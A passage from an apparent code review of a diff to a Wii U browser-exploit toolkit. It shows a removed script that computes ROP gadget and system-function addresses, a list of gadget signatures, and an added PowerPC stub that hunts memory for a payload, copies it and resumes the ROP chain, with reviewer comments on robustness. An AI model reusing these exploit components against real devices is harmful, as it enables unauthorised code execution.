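which is a mixed failure model worth a one-line comment at the `return FALSE` explaining why the loader is handled differently. In `generateropchain_type4` (hunk `@ -460,4 +483,110 @@`) r26 `sizeToCopy` is the fixed `$payload_size` (0x20000) rather than the real payload length, so the searcher copies 0x20000 bytes from the marker onward and whatever follows the actual payload in memory comes along; if that is tolerated on purpose, a comment next to `$regs[26 - 24]` saying so would spare the next reader the question.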
|
||||
|
|
|
@ -1,34 +0,0 @@
|
|||
ospath=$1
|
||||
coreinit_textaddr=$2
|
||||
extension=$3
|
||||
|
||||
reloc=$((0x02000000-$coreinit_textaddr))
|
||||
|
||||
|
||||
getcoreinit_symboladdr()
|
||||
{
|
||||
val=`powerpc-eabi-readelf -a "$PWD/$ospath.elf" | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
|
||||
printf "$2 = 0x%X;\n" $((0x$val-$reloc))
|
||||
}
|
||||
|
||||
echo "<?php"
|
||||
./bin/ropgadget_patternfinder$extension $ospath.elf --baseaddr=$coreinit_textaddr "--plainsuffix=;" --script=wiiuhaxx_locaterop_script #?1EFE3500?
|
||||
echo ""
|
||||
getcoreinit_symboladdr "memcpy" "\$ROP_memcpy"
|
||||
getcoreinit_symboladdr "DCFlushRange" "\$ROP_DCFlushRange"
|
||||
getcoreinit_symboladdr "ICInvalidateRange" "\$ROP_ICInvalidateRange"
|
||||
getcoreinit_symboladdr "OSSwitchSecCodeGenMode" "\$ROP_OSSwitchSecCodeGenMode"
|
||||
getcoreinit_symboladdr "OSCodegenCopy" "\$ROP_OSCodegenCopy"
|
||||
getcoreinit_symboladdr "OSGetCodegenVirtAddrRange" "\$ROP_OSGetCodegenVirtAddrRange"
|
||||
getcoreinit_symboladdr "OSGetCoreId" "\$ROP_OSGetCoreId"
|
||||
getcoreinit_symboladdr "OSGetCurrentThread" "\$ROP_OSGetCurrentThread"
|
||||
getcoreinit_symboladdr "OSSetThreadAffinity" "\$ROP_OSSetThreadAffinity"
|
||||
getcoreinit_symboladdr "OSYieldThread" "\$ROP_OSYieldThread"
|
||||
getcoreinit_symboladdr "OSFatal" "\$ROP_OSFatal"
|
||||
getcoreinit_symboladdr "_Exit" "\$ROP_Exit"
|
||||
getcoreinit_symboladdr "OSScreenFlipBuffersEx" "\$ROP_OSScreenFlipBuffersEx"
|
||||
getcoreinit_symboladdr "OSScreenClearBufferEx" "\$ROP_OSScreenClearBufferEx"
|
||||
getcoreinit_symboladdr "OSDynLoad_Acquire" "\$ROP_OSDynLoad_Acquire"
|
||||
getcoreinit_symboladdr "OSDynLoad_FindExport" "\$ROP_OSDynLoad_FindExport"
|
||||
getcoreinit_symboladdr "__os_snprintf" "\$ROP_os_snprintf"
|
||||
echo "?>"
|
|
@ -1,9 +0,0 @@
|
|||
--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
|
||||
--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
|
||||
--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
|
||||
--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
|
||||
--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
|
||||
--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
|
||||
--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "
|
||||
--patterntype=sha256 --patterndata=e602f66cf8aadc4d5e7db074ad9b8fbfa4190f862a8215cf26f707a49ca95070 --patternsha256size=0x28 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = "
|
||||
--patterntype=sha256 --patterndata=5e1fb4810ff6fb86bb533f2050306de6e03e09450887df6cb22c6d8511c3e267 --patternsha256size=0x18 --addval=0xFFFFFCFC "--plainout=$ROP_SETR3TOR31_POP_R31 = "
|
60
wiiuhaxx_searcher.s
Normal file
60
wiiuhaxx_searcher.s
Normal file
|
@ -0,0 +1,60 @@
|
|||
# Do not remove this.
|
||||
bl l0
|
||||
l0:
|
||||
|
||||
# Get the start search address (from r28) and save it in r4
|
||||
mr 4, 28 # Move r28(=start search address) into r4
|
||||
|
||||
# Get the target address (from r29) and save it in r3
|
||||
mr 3, 29 # Move r29(=target address into r3
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = search address
|
||||
|
||||
# Get the search for (to be precise the value-4) value (from r27) and save it in r6
|
||||
mr 6, 27 # Move r27(=search for) into r6
|
||||
addi 6,6, 4 # Add 4 to it, to get the real target value.
|
||||
|
||||
# Find search value
|
||||
skipnop: #
|
||||
lwz 5, 0(4) # load from r4 into r5
|
||||
addi 4,4,4 # increment r4 by 4
|
||||
cmp 0,0, 5,6 ; # check if it matches our search value
|
||||
bne 0,skipnop # if not, repeat.
|
||||
|
||||
# On failure we crash, on success the start address of the payload is in r4
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = startaddress of payload
|
||||
|
||||
# load "sizeToCopy" from r26 into r5, thats the size we want to copy.
|
||||
mr 5, 26 # sizeToCopy
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = startaddress of payload
|
||||
#r5 = size to copy
|
||||
|
||||
# Calculate the numbers of words to copy and save it in the counter register (payload_size>>2).
|
||||
li 6, 2 # load 2 into r6
|
||||
srw 5, 5, 6 # Shift Right Word. Shift r5 by r6 (2). To get the number of words (4 bytes each) to copy.
|
||||
mtctr 5 # ctr reg = above u32 value >> 2. Put it into counter register.
|
||||
|
||||
#r3 = target adress
|
||||
#r4 = startaddress of payload
|
||||
#ctr words to copy
|
||||
|
||||
# Copy ctr words starting from r4 to r3.
|
||||
copylp: # Copy the data from _end+4 with size *_end, to the address from r29 (which is now in r3).
|
||||
lwz 5, 0(4) # load from r4
|
||||
stw 5, 0(3) # write to r3 from r5
|
||||
addi 4,4,4
|
||||
addi 3,3,4 # increment both addresses
|
||||
bdnz copylp #Decrement count register and branch if it becomes nonzero
|
||||
|
||||
# Continue our ROP to now copy the memory from "target address" to codegen.
|
||||
add 1, 1, 30 # Jump to the code-loading ROP to load the codebin which was copied above. (add r30(=8) to r1(the stackpointer)
|
||||
lwz 3, 4(1) #read load adress from r1 with offset 4 into r3
|
||||
mtctr 3 # move r3 to count register
|
||||
bctr # continue the rop.
|
||||
|
||||
_end:
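Review bot: The marker scan at `skipnop:` has no upper bound — on a miss it keeps executing `lwz 5, 0(4)` beyond the searched region until it faults (the comment itself says "On failure we crash"), so a wrong `$payload_search_for` or `$payload_start_search` from the PHP side becomes an undiagnosable crash on the console rather than a clean exit. r24 (`OSFatal`) and r25 (`_Exit`) are already loaded by `ropgen_pop_r24_to_r31` but never used here, so a word limit in a spare register driving a `bdnzf`-style loop that bails out through r25 on exhaustion would presumably give a clean failure; the limit could be supplied from the PHP side the same way `sizeToCopy` is. The comment on `copylp:` is stale — it says the data is copied "from _end+4 with size *_end", but the loop copies from r4 (the found payload) with the r26-derived word count in ctr; suggest `# Copy ctr words from r4 (payload located above) to r3 (target address from r29).`. A header comment above `bl l0` listing the register contract this code relies on (r26 size to copy, r27 marker minus 4, r28 search start, r29 destination, r30 stack adjustment for the return into the ROP chain) would let a reader check it against the `$regs[]` table in the PHP without cross-referencing, and the stray `;` in `cmp 0,0, 5,6 ;` should go.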
|